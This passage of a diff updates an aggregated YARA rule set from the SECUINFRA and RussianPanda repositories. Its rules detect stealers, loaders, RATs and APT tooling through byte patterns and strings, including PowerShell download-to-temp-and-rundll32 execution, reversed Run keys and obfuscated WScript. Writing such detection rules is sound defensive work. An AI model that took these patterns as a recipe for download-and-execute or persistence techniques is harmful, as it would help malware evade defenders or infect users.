"StartCommWithServer" ascii - $function2 = "sendingSysInfo" ascii - $dbg0 = "*|END|*" wide - $dbg1 = "FILE>" wide - $dbg2 = "[Command Executed Successfully]" wide + $a = ".Replace(\"~\",\"0\")" condition: - uint16(0)==0x5a4d and dotnet.version=="v4.0.30319" and filesize >12KB and filesize <68KB and any of ($function*) and any of ($dbg*) + filesize <400KB and $a } -import "pe" -import "dotnet" - -rule SECUINFRA_APT_Bitter_PDB_Paths : FILE +rule SECUINFRA_OBFUS_VBS_Reverse_Startup : FILE { meta: - description = "Detects Bitter (T-APT-17) PDB Paths" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "e2ad4ac3-45fe-5087-b0d6-a5de16774229" - date = "2022-06-22" - modified = "2022-07-05" - reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L110-L133" + description = "Detecs reversed StartUp Path. Sometimes used as obfuscation" + author = "SECUINFRA Falcon Team" + id = "ecb96e30-0ac0-530a-83af-bb030f7dce4c" + date = "2022-02-27" + modified = "2022-02-27" + reference = "https://github.com/SIFalcon/Detection" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/vbs_obfuscation.yar#L2-L13" license_url = "N/A" - logic_hash = "7eb9e4c1b4e0cca070596f3702045756eb32716481bb59f2f8322221804291f5" + logic_hash = "7b4d56d3bbe8d16d5e01fa9a021a368feb28b8b062860df76a2569966a97b8bc" score = 75 quality = 70 tags = "FILE" - tlp = "WHITE" - hash0 = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396" strings: - $pdbPath0 = "C:\\Users\\Window 10 C\\Desktop\\COMPLETED WORK\\" ascii - $pdbPath1 = "stdrcl\\stdrcl\\obj\\Release\\stdrcl.pdb" - $pdbPath2 = "g:\\Projects\\cn_stinker_34318\\" - $pdbPath3 = "renewedstink\\renewedstink\\obj\\Release\\stimulies.pdb" + $reverse = "\\putratS\\smargorP\\uneM" wide nocase condition: - uint16(0)==0x5a4d and any of ($pdbPath*) + filesize <200KB and $reverse } -rule SECUINFRA_SUSP_Scheduled_Tasks_Create_From_Susp_Dir : FILE +rule SECUINFRA_OBFUS_Javascript_Wscript_Hex_Strings_Usage { meta: - description = "Detects a PowerShell Script that creates a Scheduled Task that runs from an suspicious directory" + description = "Detects the frequent usage of Wscript to get an hex encoded string from an array and interpret it. Used by e.g WSHRAT" author = "SECUINFRA Falcon Team" - id = "65aad597-c5fe-50c3-8970-19fb502f1602" - date = "2022-02-21" - modified = "2022-02-27" + id = "dd55753e-4f7b-56be-a6d4-66f1d7dc8747" + date = "2022-12-02" + modified = "2022-02-13" reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L2-L25" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/javascript_obfuscation.yar#L2-L19" license_url = "N/A" - logic_hash = "abe0592a8936898a43a1df9039829948f8a4a425c74cb970d2899d513c9cfffe" - score = 60 - quality = 25 - tags = "FILE" - version = "0.1" + logic_hash = "62bc3261b3c2e902a82423239a7ee0bcedfccbeeeda11833b935197144dc7c35" + score = 75 + quality = 70 + tags = "" strings: - $create = "New-ScheduledTaskAction" - $execute = "-Execute" - $trigger = "New-ScheduledTaskTrigger" - $at_param = "-At" - $register = "Register-ScheduledTask" - $action = "-Action" - $path1 = "C:\\ProgramData\\" - $path2 = "C:\\Windows\\Temp" - $path3 = "AppData\\Local" + $wscript = "= WScript[" + $hex_enc_str1 = "\\x63\\x72\\x65\\x61" + $hex_enc_str2 = "\\x73\\x63\\x72\\x69" + $hex_enc_str3 = "\\x71\\x75\\x69\\x74" + $hex_enc_str4 = "\\x41\\x72\\x67\\x75" condition: - filesize <30KB and 1 of ($path*) and ($create and $execute) or ($trigger and $at_param) or ($register and $action) + #wscript>30 and 2 of ($hex_enc_str*) } -rule SECUINFRA_SUSP_Reverse_Run_Key : FILE +rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll_1 : POWERSHELL DOWNLOAD { meta: - description = "Detects a Reversed Run Key" + description = "Detect a Download to %temp% and execution with rundll32.exe" author = "SECUINFRA Falcon Team" - id = "230bed16-278e-574c-bb9b-cf6c44a7e9cd" - date = "2022-02-27" - modified = "2022-02-27" + id = "f7a9d2e6-bebf-598b-9e59-db0a3001b9f9" + date = "2022-09-02" + modified = "2022-02-19" reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L27-L38" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/PowerShell_Misc/download_variations.yar#L1-L14" license_url = "N/A" - logic_hash = "dcb1a7e2c688287d08ade3d75e5c3d0dde6b645889bd4ec09ce8c131d8d3265e" + logic_hash = "7982438c032127349fb1c3477a23bab1c92eb68d9c3b26e2f5fb0a8c332dbc44" score = 65 quality = 70 - tags = "FILE" + tags = "POWERSHELL, DOWNLOAD" strings: - $run = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide + $location = "$Env:temp" nocase + $download = "downloadfile(" nocase + $rundll = "rundll32.exe" condition: - filesize <100KB and $run + $location and $download and $rundll } /* * YARA Rule Set * Repository Name: RussianPanda * Repository: https://github.com/RussianPanda95/Yara-Rules - * Retrieval Date: 2024-09-08 - * Git Commit: 7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd - * Number of Rules: 73 + * Retrieval Date: 2024-09-29 + * Git Commit: 79732e6e8f5973cbed6c6c032c2e6a9c08596874 + * Number of Rules: 75 * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance) * * @@ -206231,6 +208099,57 @@ rule SECUINFRA_SUSP_Reverse_Run_Key : FILE * * NO LICENSE SET */ +rule RUSSIANPANDA_Mal_Msedge_Dll_Virusloader : FILE +{ + meta: + description = "Detects malicious msedge.dll file" + author = "RussianPanda" + id = "7139ee30-de9a-5ef0-a96f-2ab9c239c6ff" + date = "2024-01-19" + modified = "2024-01-19" + reference = "https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/virusloader/mal_msedge_dll_virusloader.yar#L1-L16" + license_url = "N/A" + hash = "ab2e3b07170ef1516af3af0d03388868" + logic_hash = "659fd5fa3121fec5bf4cceb6f3dea95bf4cbcde7441d6f11c35288d8ad75a803" + score = 75 + quality = 85 + tags = "FILE" + + strings: + $s1 = {C6 85 ?? FE FF FF ?? C6} + $s2 = {C7 85 ?? FD FF FF} + $s3 = {BF 60 01 00 00 [18] 30 04 39 41} + + condition: + uint16(0)==0x5A4D and all of ($s*) and #s1>30 and #s2>30 and filesize <300KB +} +rule RUSSIANPANDA_Garystealer : FILE +{ + meta: + description = "Detects GaryStealer 1-3-2024" + author = "RussianPanda" + id = "4b0af30e-2cf1-539d-89fa-7e4e32cd6eab" + date = "2024-01-03" + modified = "2024-01-03" + reference = "https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/GaryStealer/garystealer-1-3-2024.yar#L1-L20" + license_url = "N/A" + hash = "6efa29a0f9d112cfbb982f7d9c0ddfe395b0b0edb885c2d5409b33ad60ce1435" + logic_hash = "f71655d0cb237c08af9c298ec9eec1ae9bd1efd50e26d61afddf9056b6883a15" + score = 75 + quality = 79 + tags = "FILE" + + strings: + $s1 = {72 75 6e 74 69 6d 65 2e 67 6f 70 61 6e 69 63} + $s2 = {4c 6f 63 61 6c 20 49 50 20 41 64 64 72 65 73 73 65 73 3a 5b 70 69 63 6b 2d 66 69 72 73 74 2d 6c 62 20 25 70 5d} + $s3 = {70 65 72 73 69 73 74 61 6E 63 65 20 63 72 65 61 74 65 64} + $s4 = {C7 40 28 ?? 00 00 00} + + condition: + uint16(0)==0x5A4D and 3 of ($s*) and filesize <20MB and #s4>2 +} import "pe" rule RUSSIANPANDA_Illyrianstealer : FILE @@ -206242,7 +208161,7 @@ rule RUSSIANPANDA_Illyrianstealer : FILE date = "2024-01-08" modified = "2024-01-08" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/IllyrianStealer/illyrian_stealer.yar#L2-L18" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/IllyrianStealer/illyrian_stealer.yar#L2-L18" license_url = "N/A" hash = "fae0aed6173804e8c22027cbb0c121eedd927f16ea7e2b23662dbe6e016980e8" logic_hash = "2012d401d3e7ce2d4d6ea12ed01a30b7d3e18f4ed47dbf70d43bae6c328960ea" @@ -206259,550 +208178,567 @@ rule RUSSIANPANDA_Illyrianstealer : FILE condition: all of ($s*) and filesize <50KB and pe.imports("mscoree.dll") } -import "pe" - -rule RUSSIANPANDA_Bandit_Stealer : FILE +rule RUSSIANPANDA_Win_Mal_Mpxdropper : FILE { meta: - description = "Detects the latest build of Bandit Stealer" + description = "Detects MpxDropper" author = "RussianPanda" - id = "ed61177d-d70d-5062-8703-f2f2b9d63751" - date = "2023-05-05" - modified = "2023-05-05" + id = "26ee0a12-c727-5953-8ebb-dd8a8d772561" + date = "2024-03-01" + modified = "2024-03-01" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/BanditStealer/bandit_stealer.yar#L3-L21" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/MpxDropper/mal_win_MpxDropper.yar#L1-L11" license_url = "N/A" - logic_hash = "304bf05a58d5b762ffe078457739188692f4f7109db929418832c4379b21ae72" - score = 50 - quality = 85 + hash = "3a44a45afbfe5fc7cdeb3723e05c4e892b079abdb7d1e8d6fc70496ef0a14d5d" + logic_hash = "e8d2672553c7f44e1cc177fad6596bd58b5c32a7541f91ce1207e6b21ef6e52d" + score = 75 + quality = 83 tags = "FILE" strings: - $s1 = {48 8D 35 ?? ?? B6 FF 48 8D BE DB ?? ?? FF 48 8D 87 AC ?? ?? 00 FF 30 C7 00 ?? ?? ?? ?? 50 57 31 DB 31 C9} - $s2 = {48 FF C0 88 17 83 E9 01 8A 10 48 8D 7F 01 75 F0} + $s1 = {43 3a 5c 55 73 65 72 73 5c 6d 70 78 31 36 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73} condition: - all of ($s*) and ( uint16(0)==0x5A4D or uint32(0)==0x4464c457f) and pe.sections[0].name contains "UPX0" and pe.sections[1].name contains "UPX1" and pe.sections[0].characteristics&pe.SECTION_MEM_EXECUTE and pe.sections[0].characteristics&pe.SECTION_MEM_WRITE and pe.sections[1].characteristics&pe.SECTION_MEM_EXECUTE and pe.sections[1].characteristics&pe.SECTION_MEM_WRITE + uint16(0)==0x5A4D and all of them } -rule RUSSIANPANDA_Sentinel_Stealer +rule RUSSIANPANDA_Win_Mal_Zloader : FILE { meta: - description = "Detects Sentinel Stealer" + description = "Detects Zloader and other Zloader modules that employ the same encryption" author = "RussianPanda" - id = "8a221d7b-8fa6-53cd-a3e8-63cc67285186" - date = "2024-01-19" - modified = "2024-01-19" + id = "3f72e067-c82b-5c65-92c8-010955971d87" + date = "2024-03-10" + modified = "2024-03-10" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/SentinelStealer/sentinel_stealer.yar#L1-L14" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Zloader/win_mal_Zloader.yar#L1-L13" license_url = "N/A" - hash = "3a540a8a81c5a5b452f154d7875423a3" - logic_hash = "b9d72848842ea4d26544633bb83fccd17239b28493bde3f73341eb2004d8ee0c" + logic_hash = "9ac9e8ca4a6f84e1bccac2292705ee6ebbc1595eb3f40ed777f7973e9bda7fc1" score = 75 quality = 85 - tags = "" + tags = "FILE" strings: - $s1 = "Sentinel.SmallerEncryptedIcon" wide - $s2 = "SentinelSteals" wide - $s4 = "_CorExeMain" + $s1 = {8B 45 ?? 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 8B 45 ?? 99 F7 F9 8B 45 ?? 48 63 D2 48 8D 0D ?? ?? ?? 00 0F BE 0C 11 31 C8 88 C2 48 8B 45 F0 48 63 4D} + $s2 = {48 63 C9 44 0F B6 04 08 48 8B 45 E8 8B 4D D4 0F B6 14 08 44 31 C2 88 14 08 8B 45 D4} + $s3 = {B9 11 00 00 00 99 F7 F9 8B [0-20] 31 C8 88 C2} + $s4 = {8B 45 ?? BE 11 00 00 00 99 F7 [0-20] 83 F6 FF} condition: - all of them + uint16(0)==0x5A4D and any of them } -rule RUSSIANPANDA_Aurorastealer_March_2023 +rule RUSSIANPANDA_Win_Mal_Gobitloader : FILE { meta: - description = "Detects an unobfuscated AuroraStealer March update binary" + description = "Detects GoBitLoader" author = "RussianPanda" - id = "a115de7a-bff7-5bb0-b83f-f66a29bbcf3f" - date = "2023-03-23" - modified = "2023-05-05" + id = "4ebc7987-c1b2-5682-943f-7c19a9cb6b36" + date = "2024-03-24" + modified = "2024-03-24" + reference = "https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/GoBitLoader/win_mal_GoBitLoader.yar#L1-L13" + license_url = "N/A" + logic_hash = "66951b290bef6a6c9eef4ea674472465dfe0ec5072dce21f48b58191f7ce90e3" + score = 75 + quality = 79 + tags = "FILE" + + strings: + $s1 = {6D 61 69 6E 2E 52 65 64 69 72 65 63 74 54 6F 50 61 79 6C 6F 61 64} + $s2 = {6D 61 69 6E 2E 48 6F 6C 6C 6F 77 50 72 6F 63 65 73 73} + $s3 = {6D 61 69 6E 2E 41 65 73 44 65 63 6F 64 65 2E 66 75 6E 63 31} + + condition: + uint16(0)==0x5A4D and all of them +} +import "pe" + +rule RUSSIANPANDA_Andeloader +{ + meta: + description = "Detects Ande Loader" + author = "RussianPanda" + id = "c08d63b6-9fef-505d-9611-9dd0403c7c7c" + date = "2023-12-11" + modified = "2023-12-11" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/AuroraStealer/Aurora_March_2023.yar#L1-L15" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/AndeLoader/ande_loader.yar#L3-L18" license_url = "N/A" - logic_hash = "d74d2843a03e826f334ce3c5eb10cc2b43cfd832174769e5d067fb877abe13a0" + logic_hash = "cd55153077e5cfbd84cbe5b062dbd842def245417acfea4ed6c2b1db702dcc81" score = 75 - quality = 85 + quality = 83 tags = "" strings: - $b1 = { 48 8D 0D ?? ?? 05 00 E8 ?? ?? EF FF } - $ftp = "FOUND FTP" + $s1 = {59 61 6E 6F 41 74 74 72 69 62 75 74 65} + $s2 = "CreateShortcut" wide + $s3 = ".vbs" wide condition: - all of them + 3 of ($s*) and pe.imports("mscoree.dll") } -rule RUSSIANPANDA_Aurorastealer_1 +rule RUSSIANPANDA_Meduzastealer : FILE { meta: - description = "Detects the Build/Group IDs if present / detects an unobfuscated AuroraStealer binary; tested on version 22.12.2022" + description = "Detects MeduzaStealer 1-2024" author = "RussianPanda" - id = "1a94096f-c838-5272-856e-42efbd123a31" - date = "2023-02-07" - modified = "2023-05-05" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/AuroraStealer/AuroraStealer.yar#L1-L16" + id = "6bc4c048-a32d-5a9c-b213-980c64d08d29" + date = "2024-01-01" + modified = "2024-01-01" + reference = "https://russianpanda.com/2023/06/28/Meduza-Stealer-or-The-Return-of-The-Infamous-Aurora-Stealer/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/MeduzaStealer/MeduzaStealer_1-1-2024.yar#L1-L16" license_url = "N/A" - logic_hash = "7a9900266a0dfa7bf0ea91a0260a1d30bd7799a491fba87db083f4fea4115f2a" - score = 50 - quality = 85 - tags = "" + logic_hash = "0547e51abd04302c45f1319bc21046ade019bc98eb85d9cba67cb2109ff642eb" + score = 75 + quality = 83 + tags = "FILE" strings: - $b1 = { 48 8D 0D ?? ?? 04 00 E8 ?? ?? EF FF } - $go = "Go build ID" - $machineid = "MachineGuid" + $s1 = {41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 57 69 6e 55 70 64 61 74 65 2e 65 78 65} + $s2 = {0f 57 ?? ?? ?? 00 00 66 0f 7f 85 ?? ?? 00 00} + $s3 = {48 8d 15 ?? ?? 05 00 49 8b cf} + $s4 = {48 8d 0d ?? ?? 06 00 ff 15 ?? ?? 06 00} condition: - all of them + 3 of ($s*) and filesize <1MB } -rule RUSSIANPANDA_Darkvnc : FILE +rule RUSSIANPANDA_Lummac2 : FILE { meta: - description = "Detects DarkVNC" + description = "Detects LummaC2 Stealer" author = "RussianPanda" - id = "dbc86ac8-5ea3-59a7-b3ab-68c603165720" - date = "2024-01-15" - modified = "2024-01-15" + id = "94d6b63f-066e-59d2-9d14-24c5d5219ba8" + date = "2024-09-12" + modified = "2024-09-12" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/DarkVNC/darkvnc.yar#L1-L15" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/LummaC2/LummaC2.yar#L1-L14" license_url = "N/A" - hash = "3c74dccd06605bcf527ffc27b3122959" - logic_hash = "1dd1246e0b22181706433f0cff9b231017e747d8faaa2db4cb9adefeab492ab7" + hash = "988f54f9694dd1ae701bacec3b83c752" + logic_hash = "875709f48ff93c8e986f3c1d2e32268bf3458d870082072e7727d8ec85b1a021" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {66 89 84 24 ?? 00 00 00 B8 ?? 00 00 00} - $s2 = {66 31 14 41 48} - $s3 = "VncStopServer" - $s4 = "VncStartServer" + $s1 = {0F B6 [2-6] 83 ?? 1F} + $s2 = {F3 A5 8B 74 24 F8 8B 7C 24 F4 8D 54 24 04 FF 54 24 FC C3} condition: - uint16(0)==0x5A4D and 3 of them and filesize <700KB + uint16(0)==0x5A4D and all of them } -rule RUSSIANPANDA_Mal_Narniarat : FILE +rule RUSSIANPANDA_Pikabot_1 : FILE { meta: - description = "Detects NarniaRAT from BotnetFenix campaign" + description = "Detects PikaBot" author = "RussianPanda" - id = "64c3a44b-5d75-5fec-bfc1-b66a5eb5780c" - date = "2024-02-02" - modified = "2024-02-02" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/NarniaRAT/mal_NarniaRAT.yar#L1-L16" + id = "e740b821-69cc-5053-9f90-439b4364656f" + date = "2024-01-02" + modified = "2024-01-02" + reference = "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/PikaBot/Pikabot_1-2-2024.yar#L1-L16" license_url = "N/A" - hash = "43f6c3f92a025d12de4c4f14afa5d098" - logic_hash = "3ee8bf6b3970c6f56ca98c87752050217e350da160a650e1724b19f340bf0230" + logic_hash = "f2dd26c23aba72c2b6b959fb411381b7d3a7466f94bf5259f57e96e44d3ee153" score = 75 quality = 85 tags = "FILE" strings: - $s1 = "client-remote desktop" - $s2 = "SendDataToServer" - $s3 = "SendRunningApps" - $s4 = "SendDataToServer" - $s5 = "SendKeys" - $s6 = "_CorExeMain" + $s1 = {8A 04 11 30 02 42 83 EE 01 75 F5 5E C3} + $s2 = {C0 E9 02 C0 E0 04 [13] C0 E2 06 02 D0} + $s3 = {8D 53 BF 80 FA 19 0F B6 C3} condition: - uint16(0)==0x5A4D and 5 of them + uint16(0)==0x5A4D and 2 of ($s*) and filesize <500KB } -rule RUSSIANPANDA_Truecrypt_Crypter : FILE +rule RUSSIANPANDA_PSWSTEALER : FILE { meta: - description = "Detects TrueCrypt crypter" + description = "PSWSTEALER" author = "RussianPanda" - id = "3ecf9c2f-6205-5e55-83a5-2b4e3ba89f07" - date = "2024-01-06" - modified = "2024-01-06" + id = "8a596074-ffe3-5979-b384-487ebe8b953c" + date = "2023-04-02" + modified = "2023-05-05" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/TrueCrypt/truecrypt_crypter.yar#L1-L27" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/PSWSTEALER/pswstealer.yar#L1-L14" license_url = "N/A" - hash = "167637397fb45ea19bafcf208d8f27dceec82caa7ab19d40ecdb08eb1b7d4f60" - logic_hash = "68612c68053e9fb81d9616c04b04ac2e2cb685f3b7ed71f8b31e8f22e3a539e7" + logic_hash = "7d85b0ccaa07419f22b9f38a4bc66435cd689b21fa7e4584ef8bea485b6bd2c1" score = 75 - quality = 81 + quality = 85 tags = "FILE" strings: - $s1_crpt1 = {77 69 6E 65 5F 67 65 74} - $s2_crpt1 = {49 3B 66 10 76} - $s2_crpt2 = {3B 55 48 89 E5 48 83 EC 10 90 8B 0D [22] E8 [3] FF} - $s3_crpt1 = {49 3B 66 10 76 43} - $s3_crpt2 = {55 48 89 E5 48 83 EC 10 [5] E8 [4] 48 85 FF 75 18} - $s4_crpt1 = {40 C0 EE 04 [16] 48 83} - $s4_crpt2 = {FA 20 [0-22] 48 83 FE 20} - $a_crpt = {61 2E 6F 75 74 2E 65 78 65 00 5F 63 67} - $s_crpt = {6F 5F 64 75 6D 6D 79 5F 65 78 70 6F 72 74} + $obf = {09 20 FF [3] 5F 06 25 17 58 0A 61 1E 62 09 1E 63 06 25 17 58 0A 61 D2 60 D1 9D} + $obf1 = {09 06 08 59 61 D2 13 04 09 1E 63 08 61 D2 13 05 07 08 11 05 1E 62 11 04 60 D1 9D 08 17 58 0C} + $enc = {73 ?? 00 00 0A 73 ?? 00 00 0A} + $s = {73 ?? 00 00 0A 0C 08 6F ?? 00 00 0A} condition: - uint16(0)==0x5A4D and $s1_crpt1 and $s2_crpt1 and $s2_crpt2 and $s3_crpt1 and $s3_crpt2 and $s4_crpt1 and $s4_crpt2 and $a_crpt and $s_crpt and filesize <7MB + all of them and filesize <200KB } -rule RUSSIANPANDA_Purelogs_Stealer_Initial_Dropper : FILE +rule RUSSIANPANDA_Ducktail : FILE { meta: - description = "Detects PureLogs Stealer Initial Payload" + description = "Ducktail Infostealer" author = "RussianPanda" - id = "c1e6a0a0-f8ed-5b78-bcae-55c1c1dfc9e4" - date = "2024-01-10" - modified = "2024-01-10" - reference = "https://russianpanda.com/2023/12/26/Pure-Logs-Stealer-Malware-Analysis/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Pure Logs Stealer/purelogs_stealer_initial_payload.yar#L1-L19" + id = "14ba165f-a1f3-5820-a6d8-e2b6ab2fbb51" + date = "2023-04-25" + modified = "2023-05-05" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Ducktail/ducktail.yar#L1-L16" license_url = "N/A" - logic_hash = "0fe94c705b94f82163f952d0a29aac4689947a1d439bdc1847ee510c25cf2e40" + logic_hash = "cb248870f6945d7a6d60d54944dc726d40ba326448af39b87325ec56445602a5" score = 75 - quality = 85 + quality = 73 tags = "FILE" strings: - $s1 = {73 ?? 00 00 06 28 ?? 00 00 ?? 2A} - $s2 = {28 ?? 00 00 06 74 ?? 00 00 1B 28 ?? 00 00 0A 2A} - $s3 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 70 6F ?? 00 00 0A 2A} - $s4 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 ?? 20 00 01 00 00 14 14 14 6F ?? 00 00 ?? 26} - $s5 = {28 ?? 00 00 ?? 73 ?? 00 00 [29] 73 15 00 00 0A [22] 28 01 00 00 2B 28 02 00 00 2B} + $s = {65 5f 73 71 6c 69 74 65 33 2e 64 6c 6c} + $s1 = {54 65 6c 65 67 72 61 6d 2e 42 6f 74 2e 64 6c 6c} + $s2 = {4e 65 77 74 6f 6e 73 6f 66 74 2e 4a 73 6f 6e 2e 64 6c 6c} + $s3 = {42 6f 75 6e 63 79 43 61 73 74 6c 65 2e 43 72 79 70 74 6f 2e 64 6c 6c} + $s4 = {53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 53 6f 63 6b 65 74 73 2e 43 6c 69 65 6e 74 2e 64 6c 6c} + $s5 = {53 79 73 74 65 6d 2e 4e 65 74 2e 4d 61 69 6c 2e 64 6c 6c} condition: - all of ($s*) and uint16(0)==0x5A4D and filesize <1MB + all of them and filesize >60MB } import "pe" -rule RUSSIANPANDA_Purelogs_Stealer_Core : FILE +rule RUSSIANPANDA_Ducktail_Myrdpservice_Bot : FILE { meta: - description = "Detects Pure Logs Stealer Core Payload" + description = "Detects Ducktail myRdpService bot" author = "RussianPanda" - id = "bda876c3-76ce-5e1e-8dd4-f06e8240fc11" - date = "2023-12-26" - modified = "2024-01-10" + id = "50786786-a7db-5290-a363-6fda139a0343" + date = "2023-12-24" + modified = "2023-12-26" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Pure Logs Stealer/purelogs_stealer_core.yar#L3-L18" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Ducktail/ducktail_myrdpservice-12-2023.yar#L3-L17" license_url = "N/A" - logic_hash = "7388299ebcc70aeb86c46c29a787f790993a67148d9f3968def1109e45f69452" + logic_hash = "a329067fbb2acc34c4970167bbce0706c5a3ec09ee89ce16817c105ae1c17b1b" score = 75 - quality = 83 + quality = 85 tags = "FILE" strings: - $s1 = {7E 58 00 00 0A [15] 28 20 00 00 0A 18 6F 0A 02 00 0A 0B} - $s2 = {50 6C 67 43 6F 72 65} - $s3 = {7E 64 01 00 0A 28 65 01 00 0A} + $s1 = {43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 49 00 64 00 2E 00 74 00 78 00 74} + $s2 = {6C 00 6F 00 67 00 5F 00 72 00 64 00 70 00 2A} + $s3 = {00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 65 00 64 00} condition: - all of ($s*) and filesize <5MB and pe.imports("mscoree.dll") + all of ($s*) and filesize <12MB and pe.exports("DotNetRuntimeDebugHeader") } -rule RUSSIANPANDA_Jinxloader : FILE +import "pe" + +rule RUSSIANPANDA_Ducktail_Mainbot : FILE { meta: - description = "Detects JinxLoader Golang version" + description = "Detects Ducktail mainbot" author = "RussianPanda" - id = "25570c99-5938-5be0-a153-a07be0d0571c" - date = "2024-01-02" - modified = "2024-01-02" + id = "f280903f-13d3-54e1-8308-781e3f777d13" + date = "2023-12-24" + modified = "2023-12-26" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/JinxLoader/JinxLoader-1-2-2024.yar#L1-L16" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Ducktail/ducktail_mainbot-12-2023.yar#L3-L19" license_url = "N/A" - hash = "6bd7ff5d764214f239af2bb58b368308c2d04f1147678c2f638f37a893995f71" - logic_hash = "13dee435fb4d40c629c0a30b6f655b87f14b10a6f6acf61d00e6c692c9bb0ff1" + logic_hash = "33b85c6e1e1137aeeb07eba957b73d738a70ddc561b42bd2d39258e90280fca4" score = 75 - quality = 81 + quality = 85 tags = "FILE" strings: - $s1 = {72 75 6E 74 69 6D 65 2E 67 6F 70 61 6E 69 63} - $s2 = {48 8D 05 4D 6E 07 00 BB 0A 00 00 00} - $s3 = {73 65 6C 66 5F 64 65 73 74 72 75 63 74 2E 62 61 74} - $s4 = {48 8D 1D B7 24 08 00 